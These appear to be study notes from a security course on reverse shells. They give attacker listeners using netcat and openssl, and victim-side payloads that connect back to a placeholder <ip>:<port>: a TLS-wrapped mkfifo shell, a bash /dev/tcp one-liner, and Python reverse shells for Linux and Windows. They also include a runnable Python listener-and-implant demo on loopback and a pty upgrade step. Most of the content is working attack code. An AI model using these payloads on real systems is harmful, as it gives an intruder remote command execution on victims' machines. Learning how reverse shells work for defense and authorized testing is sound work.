[Notes] Reverse Shell

Preface

Reverse Shell

Attacker side: listening for the reverse shell

Listening with NetCat

Listening over SSL

  1. Generate an SSL certificate with no subject (covered in the separate note linked from the original page)

  2. Listen for the reverse shell

openssl s_server -quiet -key private.key -cert public.crt -port <port>

Victim side: sending the reverse shell

Reverse shell with NetCat

Over SSL

The named pipe carries the attacker's input into the shell, and the shell's stdout and stderr are piped into openssl s_client, so the whole session is TLS-wrapped and is not visible as plain text on the wire:

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <ip>:<port> > /tmp/s;

Over bash's /dev/tcp

/dev/tcp is not a kernel device file; it is a redirection feature built into bash (it is absent from sh and dash, and some distributions compile bash without it), so this one-liner must be run by bash:

bash -i >& /dev/tcp/<ip>/<port> 0>&1

Connecting with Python

Linux

import os, socket, subprocess

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("<ip>", <port>))
# Point stdin, stdout and stderr at the socket, so everything bash
# reads and writes travels over the connection.
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
while True:
    # Respawn bash whenever it exits. Once the attacker disconnects bash
    # sees EOF at once, so this loop then spins without pause.
    subprocess.call(["/bin/bash", "-i"])

Windows

import socket, subprocess

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("<ip>", <port>))
while True:
    cmd = s.recv(1024)
    if not cmd:
        # recv() returns b"" when the attacker disconnects; stop instead
        # of looping forever on an empty command.
        break
    # Popen on Windows expects a str command with shell=True, so decode
    # the received bytes. communicate() drains stdout and stderr together,
    # which avoids the deadlock of reading one pipe while the other fills.
    process = subprocess.Popen(cmd.decode(errors="replace"), shell=True,
                               stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                               stdin=subprocess.PIPE)
    out, err = process.communicate()
    s.sendall(out + err)
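The listener and the command-loop shell above, run against each other end to end. This is an added example and not code from the original notes: the attacker side is written in Python rather than NetCat so that the whole exchange runs offline on 127.0.0.1, and the "victim" is a thread in the same process. Port 0 (let the OS pick a free port) and the two sample commands are conveniences of this demo, not settings from the notes.

```python
import socket
import subprocess
import threading


def run_command(cmd: str) -> bytes:
    """Execute one command through the local shell; return stdout+stderr."""
    proc = subprocess.run(cmd, shell=True, capture_output=True)
    return proc.stdout + proc.stderr


def victim_loop(ip: str, port: int) -> None:
    """What the implant does: connect back, then run whatever arrives."""
    with socket.create_connection((ip, port)) as s:
        while True:
            cmd = s.recv(4096)
            if not cmd:                 # b"" means the listener hung up
                return
            output = run_command(cmd.decode(errors="replace").strip())
            s.sendall(output or b"(no output)\n")


def start_listener(bind_ip: str = "127.0.0.1", port: int = 0) -> socket.socket:
    """What the attacker's NetCat listener does: bind, listen, wait for
    the callback. port=0 lets the OS choose a free port (demo only)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind_ip, port))
    srv.listen(1)
    return srv


def send_command(conn: socket.socket, cmd: str, first_wait: float = 5.0,
                 idle: float = 0.3) -> bytes:
    """Send one command and collect the reply. The protocol has no framing
    at all, so the reply is read until the victim stays quiet for `idle`
    seconds; an interactive operator gets the same effect by watching the
    terminal."""
    conn.sendall(cmd.encode() + b"\n")
    conn.settimeout(first_wait)
    data = b""
    while True:
        try:
            chunk = conn.recv(4096)
        except socket.timeout:
            return data
        if not chunk:
            return data
        data += chunk
        conn.settimeout(idle)


def demo(commands=("echo hello", "not_a_real_command_xyz")) -> list:
    """Run listener and victim loop against each other on loopback and
    return the raw reply for each command (constructed sample commands)."""
    srv = start_listener()
    port = srv.getsockname()[1]
    victim = threading.Thread(target=victim_loop, args=("127.0.0.1", port),
                              daemon=True)
    victim.start()
    conn, _ = srv.accept()
    with srv, conn:
        results = [send_command(conn, c) for c in commands]
    victim.join(timeout=5)      # closing conn makes the victim loop exit
    return results


if __name__ == "__main__":
    for reply in demo():
        print(reply.decode(errors="replace"), end="")
```

The second sample command does not exist, so its reply is the shell's error text: because the victim concatenates stderr onto stdout, the operator sees failures instead of a silent empty line. Note also what the loop does not give you: no prompt, no terminal, and any program that asks for a tty will fail, which is why the upgrade step later in these notes matters.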

Upgrading to an interactive shell

  • Once the reverse shell has connected, type the following into the reverse shell session. It is entered on the attacker's terminal but executes on the victim (the shell is bound to the socket), and it wraps the shell in a pseudo-terminal so that interactive programs behave normally.

Python

python -c 'import pty; pty.spawn("/bin/bash")'
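Why the pty step is needed, as an added example that is not part of the original notes. The one-liners above hand the shell a bare socket, so the shell has no terminal: no job control, no line editing, and programs that insist on a tty (su, sudo's password prompt, ssh) refuse to run. pty.spawn inserts a pseudo-terminal between the socket and the shell. This script shows the difference using a Python child process in place of bash (so it runs without an external shell) and pty.openpty rather than pty.spawn's fork, so the parent keeps control and can return the result.

```python
import os
import pty
import subprocess
import sys

# Stand-in for the shell: reports whether its stdin and stdout are a tty.
CHILD = [sys.executable, "-c",
         "import sys; print(sys.stdin.isatty(), sys.stdout.isatty())"]


def run_through_pipes() -> str:
    """Child attached to plain pipes, which is how a shell bound straight
    to a socket sees the world."""
    return subprocess.run(CHILD, capture_output=True, text=True).stdout.strip()


def run_through_pty() -> str:
    """Child attached to a pseudo-terminal, which is what pty.spawn
    arranges for /bin/bash on the victim."""
    master, slave = pty.openpty()
    proc = subprocess.Popen(CHILD, stdin=slave, stdout=slave, stderr=slave,
                            close_fds=True)
    os.close(slave)                 # only the child should hold the slave end
    out = b""
    while True:
        try:
            chunk = os.read(master, 1024)
        except OSError:             # Linux raises EIO once the slave closes
            break
        if not chunk:               # other platforms report plain EOF
            break
        out += chunk
    proc.wait()
    os.close(master)
    return out.decode().strip()     # pty line discipline emits "\r\n"


if __name__ == "__main__":
    print("pipes:", run_through_pipes())   # False False
    print("pty:  ", run_through_pty())     # True True
```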

Done

References

Bilibili: Qianfeng Education Network Security Academy (千锋教育网络安全学院)